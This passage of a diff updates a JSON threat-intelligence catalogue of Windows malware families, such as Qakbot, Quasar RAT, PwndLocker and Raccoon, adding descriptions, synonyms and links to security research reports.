agencies.", "meta": { @@ -13596,9 +24906,13 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pteranodon", "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/", - "https://www.vkremez.com/2019/01/lets-learn-deeper-dive-into-gamaredon.html", - "https://cert.gov.ua/news/42", + "https://www.elastic.co/blog/playing-defense-against-gamaredon-group", + "https://blog.yoroi.company/research/cyberwarfare-a-deep-dive-into-the-latest-gamaredon-espionage-campaign/", + "https://labs.sentinelone.com/pro-russian-cyberspy-gamaredon-intensifies-ukrainian-security-targeting/", "https://blog.threatstop.com/russian-apt-gamaredon-group", + "https://cert.gov.ua/news/42", + "https://www.vkremez.com/2019/01/lets-learn-deeper-dive-into-gamaredon.html", + "https://threatrecon.nshc.net/2019/06/11/sectorc08-multi-layered-sfx-recent-campaigns-target-ukraine/", "https://cert.gov.ua/news/46" ], "synonyms": [], @@ -13629,7 +24943,10 @@ "https://www.trustwave.com/Resources/SpiderLabs-Blog/New-POS-Malware-Emerges---Punkey/", "https://www.pandasecurity.com/mediacenter/malware/punkeypos/" ], - "synonyms": [], + "synonyms": [ + "pospunk", + "punkeypos" + ], "type": [] }, "uuid": "57a6dbce-2d8a-44ae-a561-282d02935698", @@ -13640,28 +24957,79 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pupy", + "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage", "https://blog.cyber4sight.com/2017/02/malicious-powershell-script-analysis-indicates-shamoon-actors-used-pupy-rat/", "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html", "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", "https://github.com/n1nj4sec/pupy", "https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations", - "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/" + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", + "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", + "https://go.recordedfuture.com/hubfs/reports/cta-2020-0123.pdf" + ], + "synonyms": [ + "Patpoopy" ], - "synonyms": [], "type": [] }, "uuid": "8a789016-5f8d-4cd9-ba96-ba253db42fd8", "value": "pupy (Windows)" }, + { + "description": "ransomware", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.purelocker", + "https://github.com/albertzsigovits/malware-notes/blob/master/PureLocker.md", + "https://exchange.xforce.ibmcloud.com/collection/99c7156cff70e1d8e1687ab7dadc8c0e", + "https://www.intezer.com/blog-purelocker-ransomware-being-used-in-targeted-attacks-against-servers/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "7a0f3f15-6920-4bc0-baa1-17dd8263948e", + "value": "PureLocker" + }, + { + "description": "Purple Fox uses msi.dll function, 'MsiInstallProductA', to download and execute its payload. The payload is a .msi file that contains encrypted shellcode including 32-bit and 64-bit versions. once executed the system will be restarted and uses the 'PendingFileRenameOperations' registry to rename it's components. \r\n\r\nUpon restart the rootkit capability of Purple Fox is invoked. It creates a suspended svchost process and injects a DLL that will create a driver with the rootkit capability. \r\n\r\nThe latest version of Purple Fox abuses open-source code to enable it's rootkit components, which includes hiding and protecting its files and registry entries. It also abuses a file utility software to hide its DLL component, which deters reverse engineering.\r\n\r\n", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.purplefox", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/security-101-the-impact-of-cryptocurrency-mining-malware", + "https://blog.trendmicro.com/trendlabs-security-intelligence/purple-fox-fileless-malware-with-rookit-component-delivered-by-rig-exploit-kit-now-abuses-powershell/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "31638e2b-1c6b-47b9-bbb9-7316f206b354", + "value": "win.purplefox" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.purplewave", + "https://www.zscaler.com/blogs/research/purplewave-new-infostealer-russia" + ], + "synonyms": [], + "type": [] + }, + "uuid": "0b63109b-0b4d-4f5d-a475-c91af4eed857", + "value": "PurpleWave" + }, { "description": "Pushdo is usually classified as a \"downloader\" trojan - meaning its true purpose is to download and install additional malicious software. There are dozens of downloader trojan families out there, but Pushdo is actually more sophisticated than most, but that sophistication lies in the Pushdo control server rather than the trojan.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pushdo", + "http://www.secureworks.com/research/threat-profiles/gold-essex", "https://www.blueliv.com/research/tracking-the-footproints-of-pushdo-trojan/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/", + "https://www.secureworks.com/research/threat-profiles/gold-essex", "https://www.trendmicro.de/cloud-content/us/pdfs/business/white-papers/wp_study-of-pushdo-cutwail-botnet.pdf", - "https://www.secureworks.com/research/pushdo", - "http://malware-traffic-analysis.net/2017/04/03/index2.html" + "http://malware-traffic-analysis.net/2017/04/03/index2.html", + "https://www.secureworks.com/research/pushdo" ], "synonyms": [], "type": [] @@ -13694,11 +25062,46 @@ "uuid": "52932caa-2fac-4eeb-88de-b3e143db010e", "value": "PvzOut" }, + { + "description": "PwndLocker is a ransomware that was observed in late 2019 and is reported to have been used to target businesses and local governments/cities. According to one source, ransom amounts demanded as part of PwndLocker activity range from $175k USD to $650k USD depending on the size of the network. PwndLocker attempts to disable a variety of Windows services so that their data can be encrypted. Various processes will also be targeted, such as web browsers and software related to security, backups, and databases. Shadow copies are cleared by the ransomware, and encryption of files occurs once the system has been prepared in this way. Executable files and those that are likely to be important for the system to continue to function appear to be skipped by the ransomware, and a large number of folders mostly related to Microsoft Windows system files are also ignored. As of March 2020, encrypted files have been observed with the added extensions of .key and .pwnd. Ransom notes are dropped in folders where encrypted files are found and also on the user's desktop.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pwndlocker", + "https://norfolkinfosec.com/tinypos-and-prolocker-an-odd-relationship/", + "https://www.cert-pa.it/notizie/pwndlocker-si-rinnova-in-prolock-ransomware/", + "https://soolidsnake.github.io/2020/05/11/Prolock_ransomware.html", + "https://raw.githubusercontent.com/fboldewin/When-ransomware-hits-an-ATM-giant---The-Diebold-Nixdorf-case-dissected/main/When%20ransomware%20hits%20an%20ATM%20giant%20-%20The%20Diebold%20Nixdorf%20case%20dissected%20-%20Group-IB%20CyberCrimeCon2020.pdf", + "https://www.intrinsec.com/egregor-prolock/", + "https://www.zdnet.com/article/fbi-prolock-ransomware-gains-access-to-victim-networks-via-qakbot-infections/", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://id-ransomware.blogspot.com/2019/10/pwndlocker-ransomware.html", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://medium.com/s2wlab/operation-synctrek-e5013df8d167", + "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://www.bleepingcomputer.com/news/security/new-pwndlocker-ransomware-targeting-us-cities-enterprises/", + "https://www.hornetsecurity.com/en/threat-research/qakbot-reducing-its-on-disk-artifacts/", + "https://www.group-ib.com/blog/prolock_evolution", + "https://www.hornetsecurity.com/en/security-information/qakbot-malspam-leading-to-prolock/", + "https://www.it-klinika.rs/blog/paznja-novi-opasni-ransomware-pwndlocker-i-u-srbiji", + "https://news.sophos.com/en-us/2020/07/27/prolock-ransomware-gives-you-the-first-8-kilobytes-of-decryption-for-free/", + "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://www.group-ib.com/blog/prolock", + "https://www.bleepingcomputer.com/news/security/pwndlocker-ransomware-gets-pwned-decryption-now-available/" + ], + "synonyms": [ + "ProLock" + ], + "type": [] + }, + "uuid": "fe0cf4ab-f151-4549-8127-f669c319d546", + "value": "PwndLocker" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pwnpos", + "https://usa.visa.com/dam/VCOM/global/support-legal/documents/new-pos-malware-samples.pdf", "https://twitter.com/physicaldrive0/status/573109512145649664", "https://blog.trendmicro.com/trendlabs-security-intelligence/pwnpos-old-undetected-pos-malware-still-causing-havoc/", "https://www.brimorlabsblog.com/2015/03/and-you-get-pos-malware-nameand-you-get.html" @@ -13714,6 +25117,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pykspa", + "https://blogs.akamai.com/sitr/2019/07/pykspa-v2-dga-updated-to-become-selective.html", "https://www.johannesbader.ch/2015/07/pykspas-inferior-dga-version/", "https://www.johannesbader.ch/2015/03/the-dga-of-pykspa/", "https://www.youtube.com/watch?v=HfSQlC76_s4" @@ -13729,9 +25133,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pylocky", - "https://www.cert.ssi.gouv.fr/alerte/CERTFR-2018-ALE-008/", - "https://sensorstechforum.com/lockymap-files-virus-pylocky-ransomware-remove-restore-data/", + "https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/", + "https://www.cybermalveillance.gouv.fr/nos-articles/outil-dechiffrement-rancongiciel-ransomware-pylocky-v1-2/", + "https://www.bleepingcomputer.com/news/security/pylocky-decryptor-released-by-french-authorities/", "https://blog.talosintelligence.com/2019/01/pylocky-unlocked-cisco-talos-releases.html", + "https://www.cyborgsecurity.com/cyborg_labs/python-malware-on-the-rise/", + "https://sensorstechforum.com/lockymap-files-virus-pylocky-ransomware-remove-restore-data/", + "https://www.cert.ssi.gouv.fr/alerte/CERTFR-2018-ALE-008/", "https://blog.trendmicro.com/trendlabs-security-intelligence/a-closer-look-at-the-locky-poser-pylocky-ransomware/" ], "synonyms": [ @@ -13742,6 +25150,30 @@ "uuid": "3a5775d3-7d4a-4795-b1b1-7a340030d490", "value": "PyLocky" }, + { + "description": "Full-featured Python RAT compiled into an executable.\r\n\r\nPyXie RAT functionality includes:\r\n* Man-in-the-middle (MITM) Interception\r\n* Web-injects\r\n* Keylogging\r\n* Credential harvesting\r\n* Network Scanning\r\n* Cookie theft\r\n* Clearing logs\r\n* Recording video\r\n* Running arbitrary payloads\r\n* Monitoring USB drives and exfiltrating data\r\n* WebDav server\r\n* Socks5 proxy\r\n* Virtual Network Connection (VNC)\r\n* Certificate theft\r\n* Inventorying software\r\n* Enumerating the domain with Sharphound", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pyxie", + "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/4", + "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/3", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/2/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://threatvector.cylance.com/en_us/home/meet-pyxie-a-nefarious-new-python-rat.html", + "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/", + "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout", + "https://www.secureworks.com/research/threat-profiles/gold-dupont", + "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/" + ], + "synonyms": [ + "PyXie RAT" + ], + "type": [] + }, + "uuid": "41217f01-2b03-41c1-88fc-cda1eee65f75", + "value": "PyXie" + }, { "description": "", "meta": { @@ -13759,11 +25191,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.qadars", - "https://securityintelligence.com/meanwhile-britain-qadars-v3-hardens-evasion-targets-18-uk-banks/", - "https://pages.phishlabs.com/rs/130-BFB-942/images/Qadars%20-%20Final.pdf", - "https://securityintelligence.com/an-analysis-of-the-qadars-trojan/", "https://info.phishlabs.com/blog/dissecting-the-qadars-banking-trojan", + "https://securityintelligence.com/an-analysis-of-the-qadars-trojan/", "https://www.johannesbader.ch/2016/04/the-dga-of-qadars/", + "https://securityintelligence.com/meanwhile-britain-qadars-v3-hardens-evasion-targets-18-uk-banks/", "https://www.welivesecurity.com/2013/12/18/qadars-a-banking-trojan-with-the-netherlands-in-its-sights/" ], "synonyms": [], @@ -13773,23 +25204,73 @@ "value": "Qadars" }, { - "description": "", + "description": "QBot is a modular information stealer also known as Qakbot or Pinkslipbot. It has been active for years since 2007. It has historically been known as a banking Trojan, meaning that it steals financial data from infected systems, and a loader using C2 servers for payload targeting and download. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot", - "https://www.johannesbader.ch/2016/02/the-dga-of-qakbot/", - "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_qakbot_in_detail.pdf", - "https://securityintelligence.com/qakbot-banking-trojan-causes-massive-active-directory-lockouts/", - "http://contagiodump.blogspot.com/2010/11/template.html", - "https://www.varonis.com/blog/varonis-discovers-global-cyber-campaign-qbot/", + "https://raw.githubusercontent.com/fboldewin/When-ransomware-hits-an-ATM-giant---The-Diebold-Nixdorf-case-dissected/main/When%20ransomware%20hits%20an%20ATM%20giant%20-%20The%20Diebold%20Nixdorf%20case%20dissected%20-%20Group-IB%20CyberCrimeCon2020.pdf", + "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/", + "https://blog.quosec.net/posts/grap_qakbot_navigation/", + "https://www.hornetsecurity.com/en/security-information/qakbot-malspam-leading-to-prolock/", + "https://elis531989.medium.com/funtastic-packers-and-where-to-find-them-41429a7ef9a7", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf", + "https://blog.morphisec.com/qakbot-qbot-maldoc-two-new-techniques", + "https://research.checkpoint.com/2020/exploring-qbots-latest-attack-methods/", + "https://malwareandstuff.com/an-old-enemy-diving-into-qbot-part-1/", "https://media.scmagazine.com/documents/225/bae_qbot_report_56053.pdf", + "https://twitter.com/redcanary/status/1334224861628039169", + "https://malwareandstuff.com/an-old-enemy-diving-into-qbot-part-3/", + "https://web.archive.org/web/20201207094648/https://go.group-ib.com/rs/689-LRE-818/images/Group-IB_Egregor_Ransomware.pdf", + "https://www.vkremez.com/2018/07/lets-learn-in-depth-reversing-of-qakbot.html", + "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware", + "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf", + "https://n1ght-w0lf.github.io/malware%20analysis/qbot-banking-trojan/", "https://www.cylance.com/en_us/blog/threat-spotlight-the-return-of-qakbot-malware.html", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://www.varonis.com/blog/varonis-discovers-global-cyber-campaign-qbot/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://www.group-ib.com/blog/egregor", + "https://www.intrinsec.com/egregor-prolock/", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://malwareandstuff.com/upnp-messing-up-security-since-years/", + "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89", + "https://www.hornetsecurity.com/en/threat-research/qakbot-reducing-its-on-disk-artifacts/", + "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf", + "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf", + "https://www.johannesbader.ch/2016/02/the-dga-of-qakbot/", + "https://blog.talosintelligence.com/2016/04/qbot-on-the-rise.html", + "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://www.microsoft.com/security/blog/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/", + "https://securityintelligence.com/qakbot-banking-trojan-causes-massive-active-directory-lockouts/", + "https://hatching.io/blog/reversing-qakbot", + "https://www.secureworks.com/research/threat-profiles/gold-lagoon", + "https://blog.talosintelligence.com/2019/05/qakbot-levels-up-with-new-obfuscation.html", + "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf", + "https://www.youtube.com/watch?v=iB1psRMtlqg", + "https://blog.quosec.net/posts/grap_qakbot_strings/", "https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Karve-etal.pdf", - "https://www.vkremez.com/2018/07/lets-learn-in-depth-reversing-of-qakbot.html" + "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf", + "https://twitter.com/TheDFIRReport/status/1361331598344478727", + "https://0xthreatintel.medium.com/reversing-qakbot-tlp-white-d1b8b37ad8e7", + "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_qakbot_in_detail.pdf", + "https://go.recordedfuture.com/hubfs/reports/cta-2020-1203.pdf", + "https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-analyzing-a-fowl-banking-trojan-part-1/", + "https://content.fireeye.com/m-trends/rpt-m-trends-2020", + "https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex", + "http://contagiodump.blogspot.com/2010/11/template.html", + "https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-qakbot-countermeasures/", + "https://www.group-ib.com/blog/prolock_evolution", + "https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-qakbot-zip-based-campaign/", + "https://www.f5.com/labs/articles/threat-intelligence/qbot-banking-trojan-still-up-to-its-old-tricks", + "https://isc.sans.edu/diary/rss/26862" ], "synonyms": [ "Pinkslipbot", - "Qbot" + "Qbot", + "Quakbot" ], "type": [] }, @@ -13829,38 +25310,69 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.quant_loader", + "https://malpedia.caad.fkie.fraunhofer.de/details/win.quantloader", "https://malwarebreakdown.com/2017/10/10/malvertising-campaign-uses-rig-ek-to-drop-quant-loader-which-downloads-formbook/", + "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", + "https://blog.malwarebytes.com/threat-analysis/2018/03/an-in-depth-malware-analysis-of-quantloader/", "https://blog.trendmicro.com/trendlabs-security-intelligence/necurs-evolves-to-evade-spam-detection-via-internet-shortcut-file/", - "https://blogs.forcepoint.com/security-labs/locky-distributor-uses-newly-released-quant-loader-sold-russian-underground", - "https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat", - "https://blog.malwarebytes.com/threat-analysis/2018/03/an-in-depth-malware-analysis-of-quantloader/" + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", + "https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat" ], "synonyms": [], "type": [] }, "uuid": "e6005ce5-3e3d-4dfb-8de7-3da45e89e549", - "value": "Quant Loader" + "value": "QuantLoader" }, { "description": "Quasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat", - "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/", - "https://www.fireeye.com/blog/threat-research/2019/04/spear-phishing-campaign-targets-ukraine-government.html", - "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", - "https://github.com/quasar/QuasarRAT/tree/master/Client", - "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/", + "https://www.cybereason.com/blog/new-malware-arsenal-abusing-cloud-platforms-in-middle-east-espionage-campaign", + "https://blog.morphisec.com/cinarat-resurfaces-with-new-evasive-tactics-and-techniques", + "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://www.secureworks.com/research/threat-profiles/aluminum-saratoga", + "https://twitter.com/malwrhunterteam/status/789153556255342596", + "https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf", + "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/", + "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://twitter.com/struppigel/status/1130455143504318466", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", - "http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments", + "https://0x00sec.org/t/master-of-rats-how-to-create-your-own-tracker/20848", + "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf", + "https://blog.malwarelab.pl/posts/venom/", + "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape", + "https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf", + "https://blog.ensilo.com/uncovering-new-activity-by-apt10", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage", + "https://blog.reversinglabs.com/blog/rats-in-the-library", + "https://www.fireeye.com/blog/threat-research/2019/04/spear-phishing-campaign-targets-ukraine-government.html", + "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", + "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", + "https://www.zscaler.com/blogs/research/shellreset-rat-spread-through-macro-based-documents-using-applocker-bypass", + "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/", + "https://www.fortinet.com/blog/threat-research/uncovering-new-activity-by-apt-", + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", + "https://blogs.jpcert.or.jp/en/2020/12/quasar-family.html", + "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/", + "https://www.secureworks.com/research/threat-profiles/bronze-riverside", + "https://threatpost.com/apt-exploits-zerologon-targets-japanese-companies/161383/", "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf?platform=hootsuite", "https://ti.360.net/blog/articles/analysis-of-apt-c-09-target-china/", - "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", - "https://twitter.com/malwrhunterteam/status/789153556255342596", - "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/" + "https://www.antiy.cn/research/notice&report/research_report/20201228.html", + "http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments", + "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/" + ], + "synonyms": [ + "CinaRAT", + "QuasarRAT", + "Yggdrasil" ], - "synonyms": [], "type": [] }, "uuid": "05252643-093b-4070-b62f-d5836683a9fa", @@ -13892,12 +25404,41 @@ "uuid": "06f63e6b-d177-4e21-b432-e3a219bc0965", "value": "r980" }, + { + "description": "Raccoon is a stealer and collects \"passwords, cookies and autofill from all popular browsers (including FireFox x64), CC data, system information, almost all existing desktop wallets of cryptocurrencies\".", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.raccoon", + "https://www.cybereason.com/blog/hunting-raccoon-stealer-the-new-masked-bandit-on-the-block", + "https://medium.com/s2wlab/w1-feb-en-story-of-the-week-stealers-on-the-darkweb-49945a31601d", + "https://www.youtube.com/watch?v=1dbepxN2YD8", + "https://www.group-ib.com/blog/fakesecurity_raccoon", + "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a", + "https://www.youtube.com/watch?v=5KHZSmBeMps", + "https://www.secfreaks.gr/2019/12/in-depth-analysis-of-an-infostealer-raccoon.html", + "https://www.riskiq.com/blog/labs/magecart-medialand/", + "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", + "https://blog.malwarebytes.com/social-engineering/2020/09/malvertising-campaigns-come-back-in-full-swing/", + "https://webcache.googleusercontent.com/search?q=cache:AvJw47-V_WwJ:https://ultrahacks.org/shop/product/raccoon-stealer-onion-panel/+&cd=1&hl=en&ct=clnk&gl=ch&client=firefox-b-d", + "https://lp.cyberark.com/rs/316-CZP-275/images/CyberArk-Labs-Racoon-Malware-wp.pdf", + "https://www.bitdefender.com/files/News/CaseStudies/study/289/Bitdefender-WhitePaper-Fallout.pdf" + ], + "synonyms": [ + "Mohazo", + "RaccoonStealer", + "Racealer", + "Racoon" + ], + "type": [] + }, + "uuid": "027fb7d0-3e9b-4433-aee1-c266e165a5cc", + "value": "Raccoon" + }, { "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.radamant", - "https://www.cyphort.com/radamant-ransomware-distributed-via-rig-ek/" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.radamant" ], "synonyms": [], "type": [] @@ -13918,6 +25459,66 @@ "uuid": "271752e3-67ca-48bc-ade2-30eec11defca", "value": "RadRAT" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ragnarlocker", + "https://krebsonsecurity.com/2020/11/ransomware-group-turns-to-facebook-ads/", + "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/", + "https://www.bleepingcomputer.com/news/security/capcom-hit-by-ragnar-locker-ransomware-1tb-allegedly-stolen/", + "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", + "https://www.zdnet.com/article/capcom-quietly-discloses-cyberattack-impacting-email-file-servers/", + "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", + "https://news.sophos.com/en-us/2021/02/03/mtr-casebook-uncovering-a-backdoor-implant-in-a-solarwinds-orion-server/", + "https://blog.blazeinfosec.com/dissecting-ragnar-locker-the-case-of-edp/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", + "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion", + "https://www.bleepingcomputer.com/news/security/ragnarlocker-ransomware-hits-edp-energy-giant-asks-for-10m/", + "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf", + "https://www.waterisac.org/system/files/articles/FLASH-MU-000140-MW.pdf", + "https://www.bleepingcomputer.com/news/security/japanese-game-dev-capcom-hit-by-cyberattack-business-impacted/", + "https://id-ransomware.blogspot.com/2020/02/ragnarlocker-ransomware.html", + "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", + "https://securelist.com/targeted-ransomware-encrypting-data/99255/", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ragnarlocker-ransomware-threatens-to-release-confidential-information" + ], + "synonyms": [], + "type": [] + }, + "uuid": "33f55172-873b-409e-a09b-97ac1301b036", + "value": "RagnarLocker" + }, + { + "description": "According to Bleeping Computer, the ransomware is used in targeted attacks against unpatched Citrix servers. It excludes Russian and Chinese targets using the system's Language ID for filtering. It also tries to disable Windows Defender and has a number of UNIX filepath references in its strings. Encryption method is AES using a dynamically generated key, then bundling this key up via RSA.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ragnarok", + "https://github.com/k-vitali/Malware-Misc-RE/blob/master/2020-01-26-ragnarok-cfg-vk.notes.raw", + "https://www.bleepingcomputer.com/news/security/ragnarok-ransomware-targets-citrix-adc-disables-windows-defender/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://news.sophos.com/en-us/2020/05/21/asnarok2/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ce9dffb7-2220-4e9c-9cb1-221195ba42ba", + "value": "Ragnarok" + }, + { + "description": "Raindrop is a loader for Cobalt Strike that was observed in the SolarWinds attack.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.raindrop", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware" + ], + "synonyms": [], + "type": [] + }, + "uuid": "309f9be7-8824-4452-90b3-cef81fd10099", + "value": "Raindrop" + }, { "description": "", "meta": { @@ -13936,7 +25537,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rambo", 